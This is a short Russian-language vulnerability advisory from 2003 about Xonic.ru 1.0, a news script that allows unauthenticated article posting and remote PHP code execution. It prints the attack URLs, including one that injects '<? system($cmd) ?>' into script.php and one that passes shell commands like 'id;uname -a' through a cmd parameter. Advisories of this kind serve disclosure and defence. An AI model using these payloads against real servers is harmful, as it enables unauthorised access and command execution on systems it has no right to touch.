Выполнение произвольных команд и неавторизованный доступ в Xonic.ru

Дата публикации:
03.04.2003
Всего просмотров:
774
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: DWC Gr0up сообщил об уязвимости в Xonic.ru. Удаленный пользователь может добавлять статьи и выполнять произвольные команды на сервере.

Удаленный пользователь может добавить статьи без предварительной авторизации, используя следующий URL:

http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.
Также удаленный пользователь может выполнить произвольный PHP код, включая команды оболочки, на целевом сервере:
http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>

 http://[target]/index.php?cmd=id;uname -a;
Уязвимость обнаружена в Xonic.ru 1.0

Ссылки: Vulnerability in News
или введите имя

CAPTCHA